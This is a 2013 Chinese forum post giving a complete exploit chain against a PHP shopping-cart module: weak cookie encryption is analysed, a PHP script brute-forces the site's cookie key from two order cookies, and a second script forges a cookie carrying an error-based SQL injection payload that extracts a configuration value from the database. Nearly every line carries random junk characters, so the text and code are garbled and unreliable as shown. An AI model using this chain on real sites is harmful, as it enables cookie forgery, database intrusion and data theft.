www.xxx.com/plus/search.php?keyword=5 u x* ~- H4 |
在 include/shopcar.class.php中- P w3 z Y! I: q
先看一下这个shopcar类是如何生成cookie的. p B" }# x, T" I' u0 j
239 function saveCookie($key,$value)
% `. O+ e* q" T, [7 B240 {
' H2 B s- B# I: s241 if(is_array($value))
: Z7 N; c, `: Y' \4 W" G8 D242 {
* \" @# L( }' D+ v4 s243 $value = $this->enCrypt($this->enCode($value));
1 K( X [+ P" }* j244 }1 b3 L$ ]' V# ]+ h! I
245 else2 r/ \" S% d- `
246 {+ Q9 L7 E$ d' x. g9 p1 M
247 $value = $this->enCrypt($value);
7 `( ~5 F2 B) D* {) s; v: J# p$ U248 }
+ b; ?6 C" M! s( W2 G4 `7 I, {; u249 setcookie($key,$value,time()+36000,’/');
X6 i1 A4 A0 O1 a# ~250 }
; X4 c' W! ?* q# Z: G简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
3 W: n# j9 N0 A( Q% E186 function enCrypt($txt)
: R+ ?5 _1 i& \2 S187 {; i2 U. k( T$ z# `/ B
188 srand((double)microtime() * 1000000);
& ~, W7 z z2 Y I! b# L189 $encrypt_key = md5(rand(0, 32000));
8 w Y/ y6 `* e190 $ctr = 0;" ?+ e- E$ W6 ~1 D E$ j2 q# l3 i
191 $tmp = ”;
5 c0 H4 ?4 X# N% N6 ^! K/ I$ y192 for($i = 0; $i < strlen($txt); $i++)
p. e/ z! ?1 t9 I4 P1 V193 {* Y7 i7 X/ C, t0 I" F6 S8 h: t
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;- s2 w+ f& V. |& x, }
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
& A" `& f+ X! H) {196 }5 {1 n1 U$ w* d4 n4 S
197 return base64_encode($this->setKey($tmp));+ r; ]: Z( l( B: @5 }- v6 _* S/ m
198 }+ h4 o; J$ W) z, m
213 function setKey($txt)) f4 E- {$ N# n e
214 {, D- l6 b; i7 M4 m, q* n$ y
215 global $cfg_cookie_encode;
) `8 @2 @* P6 p0 E4 y7 G216 $encrypt_key = md5(strtolower($cfg_cookie_encode));6 y( b7 h9 d+ H
217 $ctr = 0;" f V2 [: i* X: z, k
218 $tmp = ”;- o! A2 `. `+ I+ r W1 s
219 for($i = 0; $i < strlen($txt); $i++)+ l" w8 K0 s: g2 ?+ A! c
220 {
. K; L" B, f- t221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
+ l* ^' C1 V# a& R: j/ L- q222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];& ^1 {* U. u( j8 G
223 }3 w' z+ \. t* v* b+ k6 n
224 return $tmp;; V V- g- G2 ^- O" Y
225 }' p: z/ H) j- H- l1 V1 a
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
( C! O( @: Q+ O e2 J然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。7 d" O# B W. }( S( A; x
具体代码如下:) m) c7 I$ t+ r: v2 l9 R4 L$ K
<?php4 d; O. r1 J5 M o. ]
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here r7 R! u2 z5 Z! ]* J& o' {
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
; U8 m0 b1 f, |2 M0 |- O$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
% {, _! x, U6 N. Zfunction reStrCode($code,$string)
$ K, S7 H: N8 B: a( s* d. N. c$ p{
]" E: W, D0 R$ W( ?$code = base64_decode($code);# K; w) k3 J5 i8 d& [7 g1 H
$key = “”;2 O' `+ x" L% d' [
for($i=0 ; $i<32 ; $i++)
; g+ O' W6 Y Y; k2 h E+ p{9 b/ ]0 z2 {, O* |
$key .= $string[$i] ^ $code[$i];4 _& [% i+ {0 |0 B
}5 c% ~1 V2 N1 Y* Y( D4 t( J
return $key;
1 {: a' S1 v) {9 f/ d+ k}
9 L5 L6 g- B& i! qfunction getKeys($cookie,$plantxt)% A$ n1 r) c9 f, b! A; v+ d
{: q! ~( h& L) _1 w7 E
$tmp = $cookie;
& J2 }* E4 n+ t& a4 e$results = array();6 _9 n4 k5 V' s- a& g
for($j=0 ; $j < 32000; $j++)6 K- P/ I' g2 W5 e' l8 _
{
8 x7 H3 z- q* A! K- `: `6 b9 K
. Y% [0 I$ r \6 ~. T$txt = $plantxt;4 P9 I3 C9 d' z, M$ R
$ctr = 0;# o- R0 m& P6 I% c: p% g
$tmp = ”;0 J6 m2 o0 W" j& z( `9 i0 ~/ p; T& W
$encrypt_key = md5($j);
+ a4 G2 f3 x/ @8 { Qfor($i =0; $i < strlen($txt); $i ++)
5 z" M, o5 a& D; S. U% }' ~7 @{! B; a5 K& g, r* W3 G9 S! Y
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
! X0 O; z8 G+ O, B. } g$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);+ _6 q6 z. G) \
}2 p6 U. l" s+ y
$string = $tmp;
/ r2 w2 m# W5 v+ t! ?5 G$code = $cookie;8 c) W. m3 X* B) O) c
$result = reStrCode($code,$string);+ a: |/ {$ P7 ~+ b! y( K8 l. S: a
if(eregi(‘^[a-z0-9]+$’,$result))
6 L7 l% y" b) m9 J' m4 }4 i" Z: w{: q d. x, A' |' [* M
echo $result.”\n”;# h4 g) U. |3 {! e* |
$results[] = $result;; l. M, |/ C' H- A# @- Q4 m
}; q Z3 J8 p+ D' U, d
}
; z$ q* X* ]4 J5 M! i1 {% `return $results;6 X2 ^' g, l' |% U
}
, u3 J& ]: f6 F; F- ]1 l9 B; O$results1 = getKeys($cookie1,$plantxt);
0 f: N( t2 {' `; F$results2 = getKeys($cookie2,$plantxt);: H4 O& ~0 e: f( h* p
print “\n——————–real key————————–\n”;* Y( \7 k6 B! c6 _% j! ^, t
foreach($results1 as $test1)* X j+ h% ?. |' V6 q
{
7 m3 h' R' \ U2 B) Wforeach($results2 as $test2)0 N4 w1 p0 Y5 ]8 D1 ?
{9 G0 _9 z1 k2 t. @( ]; p9 e
if($test1 == $test2)
7 S6 R6 L9 W. Z6 X6 k( ~/ ^{( W: ]4 J0 e6 W# t' v, R" ]; X
echo $test1.”\n”;" t' W7 n* L' D2 J$ I- F" L
}
( P0 I; ]. v2 G1 d& P}
( C9 x. Y3 w/ f}
! }# ~- g9 E3 M' ]! w7 {2 S?>
% h$ g' f; ?2 R! ycookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
4 B+ a% W+ F u' k( T, X% Zplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
0 E2 z1 A2 R2 G/ Y( o然后推算出md5(strtolower($cfg_cookie_encode)); t" b2 h7 U- e8 r' `* p* t4 t( t
得到这个key之后,我们就可以构造任意购物车的cookie8 N& Q4 j7 h5 I) T
接着看
8 u* E' Y1 c3 Q' J5 i20 class MemberShops8 m+ H; e( p; Y5 I4 U
21 {& R1 n0 N1 V8 U8 ]: [- ^
22 var $OrdersId;
8 ?4 W% U, c$ r; S# K8 M23 var $productsId;
5 h# v3 s* i6 F* L24; e+ z* s* {9 K* i
25 function __construct()
# K0 V9 M. s: z* [( ^/ q" [( R26 {$ H9 L" Q+ r9 Y2 ^ c
27 $this->OrdersId = $this->getCookie(“OrdersId”);
4 S" y, h$ a) a' p! A28 if(empty($this->OrdersId))% w1 P4 {! \& ^9 Y+ F" {& k
29 {
7 }" Z" ~& `: ~" o y- X" m30 $this->OrdersId = $this->MakeOrders();. n. H, V8 Y9 M+ ^( L% O
31 }
% N [9 w5 u5 ?2 i: M0 y& o0 C2 \32 }6 s2 x: u+ Y# t8 G
发现OrderId是从cookie里面获取的6 j4 w* y5 @7 a/ B1 S( V( `
然后& x7 p& e" Q7 K( d+ ?2 A+ H
/plus/carbuyaction.php中的! F5 t+ a8 U0 G8 y
29 $cart = new MemberShops();/ w6 K6 V6 J# i
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
1 _/ e; G" B5 i Q. ]# m……4 H) d7 ^/ g) t0 A
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);+ @1 B/ r# | p8 m
接着我们就可以注入了& M) L r4 A8 X0 x/ f
通过利用下面代码生成cookie:
8 d# t- `- g- v) x<?php; U$ `, ?2 w, X' G" ~
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;2 k1 N. D6 V T. I/ y1 c1 `7 B
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
' v* d& _8 @1 l* E) O( z/ ]function setKey($txt)
9 m1 C Q% s5 S{
& z+ @3 ]: T, T* Q: a( z7 _global $encrypt_key;. R+ b. E) B6 o2 F* i; o% T
$ctr = 0;
# Z, D( m* k4 ^3 X$tmp = ”;& }; {9 D4 d; V' C( t \
for($i = 0; $i < strlen($txt); $i++)3 n! m7 G/ ^- c( A
{* D; d4 C' m7 Y) \7 q6 N
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;- C; m% T5 r# a6 m
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];, ~3 v+ D: k( O# G9 R1 s$ M
}
9 K5 Q9 V2 c m! Vreturn $tmp;! Z7 K. b+ g. x6 z$ K+ @
}$ o. l$ M. {- U. }) V; P, K6 e
function enCrypt($txt)
& k3 @- b8 J7 D3 u, H5 T& @& J{
9 J/ [, y. [% ?( |* B% ~* |0 }srand((double)microtime() * 1000000);) \$ d2 _, W- g' z/ u
$encrypt_key = md5(rand(0, 32000));
' Q/ k- C) q( ?* R3 L3 u$ctr = 0;* @4 q6 O ^3 v* T. H
$tmp = ”;
' k* j2 X+ c) Ffor($i = 0; $i < strlen($txt); $i++)
, I# L( n h' S; U- d{
# ~' n; \/ J6 O- y$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) u& @) P& w- J+ V# p
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
) W" w; e5 C8 u$ t h}
8 F1 N W, E- Mreturn base64_encode(setKey($tmp));5 a ~/ _% N6 V5 ^
}. d( p3 x/ m5 {
for($dest =0;$dest = enCrypt($txt);)
: }- D1 Y" h9 E( c. S& y; z6 B{
+ g L( u6 n9 U. S6 J' `if(!strpos($dest,’+'))
7 `$ p1 v# B! o$ x9 `' m2 l{
* s. J4 F& i' fbreak;
1 n. c$ _" o% @! \ K. T' v0 E8 j; E}
- {! x" @9 v N6 e, P# h4 R}/ t* W6 b& ?' w" o7 S7 h S
echo $dest.”\n”;- W* U' |: c$ l* S# b+ m o( N9 Z9 @
?>
4 g" t+ D* O1 i' [
' c# K7 y8 ~& [+ g: h |
发表于 2013-2-13 23:58:29
收藏
支持
反对